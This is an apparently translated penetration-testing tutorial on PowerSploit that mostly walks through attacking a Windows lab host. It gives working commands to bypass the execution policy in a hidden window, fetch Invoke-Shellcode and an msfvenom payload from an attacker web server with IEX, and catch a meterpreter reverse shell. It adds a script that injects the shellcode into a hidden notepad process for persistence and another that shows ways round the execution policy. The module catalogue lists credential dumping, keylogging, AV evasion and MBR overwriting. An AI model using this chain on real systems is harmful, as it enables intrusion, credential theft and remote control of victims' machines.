PowerSploit: a PowerShell tool for internal-network penetration testing

PowerShell is a command-line shell and scripting environment that gives command-line users and script authors access to the .NET Framework. A PowerShell script is a text file whose name carries the extension ".ps1". PowerShell depends on the .NET runtime and works natively with .NET objects; its readability and ease of use are among the best of any shell.

PowerShell has the following characteristics.

1. It is installed by default on Windows 7 / Server 2008 R2 and later.

2. PowerShell scripts can run entirely in memory without being written to disk.

3. Historically it rarely triggered antivirus. This is no longer a safe assumption: on Windows 10 / Server 2016 and later, AMSI hands script content to the installed AV engine at run time, and script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) records what actually executed, even when it was obfuscated or pulled down with IEX.

4. It can execute commands remotely.

5. Many current offensive tools are written in PowerShell.

6. It makes script-based attacks on Windows considerably easier.

7. cmd.exe is often blocked by policy while PowerShell is not; the converse also happens, so check which hosts (powershell.exe, powershell_ise.exe and the 32-bit copies) the target actually restricts.

8. It can be used to manage Active Directory.


The basics of PowerShell commands are illustrated below with file operations.

1. Create a directory: New-Item whitecellclub -ItemType Directory

2. Create a file: New-Item light.txt -ItemType File

3. Delete a directory: Remove-Item whitecellclub

4. Display file contents: Get-Content test.txt

5. Set file contents: Set-Content test.txt -Value "hello, world!"

6. Append contents: Add-Content light.txt -Value "i love you"

7. Clear contents: Clear-Content test.txt

 

See the PowerShell online tutorial: https://www.pstips.net/powershell-online-tutorials

 

Attacker: Kali Linux

Target: Windows Server 2008 R2

First, start the web server on Kali.

Clone the latest PowerSploit scripts to the attacker: git clone https://github.com/mattifestation/PowerSploit.git

PowerSploit is a security project on GitHub containing a large number of PowerShell attack scripts, used mainly for reconnaissance, privilege escalation and persistence during a penetration test.

Copy the PowerSploit directory into the web root.

Use msfvenom to generate a reverse-shell payload in PowerShell format (the output defines a byte array named $buf, which is what Invoke-Shellcode expects) and place that file in the web root as well.

 

 

(1) Running scripts despite the local execution policy

If PowerShell is running as an administrator, the script execution policy can simply be changed:

set-executionpolicy unrestricted

This is a persistent registry change at LocalMachine scope; the per-process switch below is usually preferable during an assessment.

By default the execution policy prevents .ps1 files from being run directly. The following one-liner bypasses the policy for a single process and runs a script (upload PowerUp.ps1 to the target first):

powershell.exe -exec bypass -Command "& {Import-Module C:\PowerUp.ps1; Invoke-AllChecks}"

To run hidden, with the window closing as soon as the command finishes, prefix the command with:

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -NonI

 

(2) Download the PS1 script from the web server and run it in memory

Run the following on the target (for clarity both Invoke-Shellcode and the generated payload are fetched with IEX, i.e. Invoke-Expression, so neither touches disk):

IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.1/CodeExecution/Invoke-Shellcode.ps1")

IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.1/code")

The first line defines the Invoke-Shellcode function in the current session; the second evaluates the msfvenom output, which defines the byte array $buf. Then execute:

Invoke-Shellcode -Shellcode $buf -Force

-Force suppresses the confirmation prompt that Invoke-Shellcode otherwise shows.

Set up the listener in msf:

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.47.131

LHOST must be the attacker's address and must match the LHOST the payload was generated with in msfvenom. Start the listener and check the result.

If that PowerShell window is closed the connection drops, because the process hosting the shellcode is the PowerShell process itself.
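The whole target-side chain above as one script, written as an added example for this page rather than taken from the article or from PowerSploit itself. It goes one step beyond the walkthrough by using Invoke-Shellcode's -ProcessID parameter (listed in the module summary below as "injects shellcode into the process ID of your choosing") to put the payload in a sacrificial process, so closing the PowerShell window no longer kills the session. Assumptions: 192.168.1.1 is the article's web server, it serves PowerSploit at its root and the msfvenom output as /code, and the payload architecture matches the process you inject into. Lab use only.

```powershell
# Added example, not from the original article. Assumes the article's web
# root at 192.168.1.1 serving PowerSploit and an msfvenom "-f powershell"
# payload as /code. Run on the target with the msf handler already listening.

$Web = 'http://192.168.1.1'
$wc  = New-Object System.Net.WebClient

# 1. Define Invoke-Shellcode in this session (nothing is written to disk)
Invoke-Expression $wc.DownloadString("$Web/CodeExecution/Invoke-Shellcode.ps1")

# 2. Evaluate the payload; msfvenom -f powershell emits "[Byte[]] $buf = 0xfc,..."
Invoke-Expression $wc.DownloadString("$Web/code")
if (-not $buf) { throw 'payload did not define $buf' }

# 3. Start a sacrificial host process. Architecture must match the payload:
#    an x64 payload needs a 64-bit process, an x86 payload a 32-bit one.
$proc = Start-Process -FilePath "$env:windir\System32\notepad.exe" `
                      -WindowStyle Hidden -PassThru

# 4. Inject into that process instead of into powershell.exe. -Force skips
#    the confirmation prompt. Without -ProcessID the shellcode runs inside
#    this PowerShell and dies with it, which is what the article observes.
Invoke-Shellcode -ProcessID $proc.Id -Shellcode $buf -Force

"injected into PID $($proc.Id); this PowerShell window can now be closed"
```

Start the multi/handler before running this: a reverse_tcp payload connects back immediately on injection, and if nothing is listening the thread simply exits inside notepad.exe.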

 

The parameters used in the commands above:

1. -ExecutionPolicy Bypass (-Exec Bypass): sets the execution policy for this process only. By default (Restricted on client Windows and on Server 2008 R2, RemoteSigned on Server 2012 R2 and later) PowerShell refuses to run .ps1 files, but still runs commands typed interactively or passed via -Command. Bypass lifts the file check for the process without changing the persistent setting. It is not a security boundary: it does not defeat a Group Policy-enforced policy (MachinePolicy/UserPolicy scopes), AppLocker or WDAC rules, AMSI scanning or script block logging. It is nonetheless used on almost every PowerShell invocation during a penetration test.

2. -WindowStyle Hidden (-W Hidden): hides the window.

3. -NonInteractive (-NonI): non-interactive mode; PowerShell does not present an interactive prompt to the user. -NoProfile (-NoP): the console does not load the current user's profile scripts.

4. -NoExit: does not exit the shell after running the command. Important for scripts that must keep running, such as keyloggers.

5. -NoLogo: starts PowerShell without the copyright banner.

64-bit Windows ships two copies of Windows PowerShell, one x64 and one x86. Each has its own profile directory and its own execution-policy setting (the x86 host reads the registry through the WOW64 redirected view), so they can be treated as two independent programs. The x64 host lives under %windir%\System32\WindowsPowerShell\v1.0\ and the x86 host under %windir%\SysWOW64\WindowsPowerShell\v1.0\.
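To make the policy and host discussion concrete, the following script is an added example (not from the article) that reports the execution policy at every scope, identifies which of the two hosts it is running in, and then runs a scratch script three ways on a default Restricted machine: with the per-process -ExecutionPolicy Bypass switch, by evaluating the file's text with Invoke-Expression, and by feeding the text on stdin. The scratch file name under %TEMP% is an arbitrary choice for the demonstration; it assumes Windows PowerShell 5.1 on 64-bit Windows.

```powershell
# Added example, not from the original article. Assumes Windows PowerShell
# 5.1 on 64-bit Windows; the scratch file name is arbitrary.

# 1. Execution policy is evaluated per scope, top entry first; the first
#    scope that is not Undefined wins. MachinePolicy and UserPolicy come from
#    Group Policy and override anything set from the command line.
Get-ExecutionPolicy -List | Format-Table -AutoSize
"Effective policy : $(Get-ExecutionPolicy)"

# 2. Which host is this? System32 holds the 64-bit powershell.exe, SysWOW64
#    the 32-bit one. Each has its own profile and policy setting.
"Host directory   : $PSHOME"
"64-bit process   : $([Environment]::Is64BitProcess)"

# 3. A scratch script whose only job is to show that it ran. Single quotes
#    keep $PID and the sub-expression unexpanded until the script executes.
$scratch = Join-Path $env:TEMP 'policy-demo.ps1'
Set-Content -Path $scratch -Value '"ran as PID $PID under policy $(Get-ExecutionPolicy)"'

# 3a. Per-process override, no persistent change (what -Exec Bypass does).
#     Fails only if Group Policy enforces a policy, in which case 3b/3c
#     still work because no .ps1 file is "executed".
& "$PSHOME\powershell.exe" -NoProfile -ExecutionPolicy Bypass -File $scratch

# 3b. Read the file and evaluate its text in the current session; the
#     policy only gates script files, so it is never consulted here.
Invoke-Expression (Get-Content -Path $scratch -Raw)

# 3c. Same idea, handing the text to a child host on stdin ("-Command -").
Get-Content -Path $scratch -Raw | & "$PSHOME\powershell.exe" -NoProfile -Command -

Remove-Item -Path $scratch
```

On a default Restricted client all three launches print the message. Run the same script from the SysWOW64 host and the reported $PSHOME, bitness and (if LocalMachine policy was set from only one host) effective policy change, which is the independence described in the paragraph above.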


PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts:

CodeExecution

Execute code on a target machine.

Invoke-DllInjection

Injects a Dll into the process ID of your choosing.

Invoke-ReflectivePEInjection

Reflectively loads a Windows PE file (DLL/EXE) into the PowerShell process, or reflectively injects a DLL into a remote process.

Invoke-Shellcode

Injects shellcode into the process ID of your choosing or within PowerShell locally.

Invoke-WmiCommand

Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel.

ScriptModification

Modify and/or prepare scripts for execution on a compromised machine.

Out-EncodedCommand

Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.

Out-CompressedDll

Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.

Out-EncryptedScript

Encrypts text files/scripts.

Remove-Comment

Strips comments and extra whitespace from a script.

Persistence

Add persistence capabilities to a PowerShell script.

New-UserPersistenceOption

Configure user-level persistence options for the Add-Persistence function.

New-ElevatedPersistenceOption

Configure elevated persistence options for the Add-Persistence function.

Add-Persistence

Add persistence capabilities to a script.

Install-SSP

Installs a security support provider (SSP) dll.

Get-SecurityPackages

Enumerates all loaded security packages (SSPs).

AntivirusBypass

AV doesn't stand a chance against PowerShell!

Find-AVSignature

Locates single Byte AV signatures utilizing the same method as DSplit from "class101".

Exfiltration

All your data belong to me!

Invoke-TokenManipulation

Lists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread.

Invoke-CredentialInjection

Create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon).

Invoke-NinjaCopy

Copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures.

Invoke-Mimikatz

Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz.

Get-Keystrokes

Logs keys pressed, time and the active window.

Get-GPPPassword

Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.

Get-GPPAutologon

Retrieves autologon username and password from registry.xml if pushed through Group Policy Preferences.

Get-TimedScreenshot

A function that takes screenshots at a regular interval and saves them to a folder.

New-VolumeShadowCopy

Creates a new volume shadow copy.

Get-VolumeShadowCopy

Lists the device paths of all local volume shadow copies.

Mount-VolumeShadowCopy

Mounts a volume shadow copy.

Remove-VolumeShadowCopy

Deletes a volume shadow copy.

Get-VaultCredential

Displays Windows vault credential objects including cleartext web credentials.

Out-Minidump

Generates a full-memory minidump of a process.

Get-MicrophoneAudio

Records audio from the system microphone and saves it to disk.

Mayhem

Cause general mayhem with PowerShell.

Set-MasterBootRecord

Proof of concept code that overwrites the master boot record with the message of your choice.

Set-CriticalProcess

Causes your machine to blue screen upon exiting PowerShell.

Privesc

Tools to help with escalating privileges on a target.

PowerUp

Clearing house of common privilege escalation checks, along with some weaponization vectors.

Recon

Tools to aid in the reconnaissance phase of a penetration test.

Invoke-Portscan

Does a simple port scan using regular sockets, based (pretty) loosely on nmap.

Get-HttpStatus

Returns the HTTP Status Codes and full URL for specified paths when provided with a dictionary file.

Invoke-ReverseDnsLookup

Scans an IP address range for DNS PTR records.

PowerView

PowerView is a series of functions that perform network and Windows domain enumeration and exploitation.

Recon\Dictionaries

A collection of dictionaries used to aid in the reconnaissance phase of a penetration test. Dictionaries were taken from the following sources.
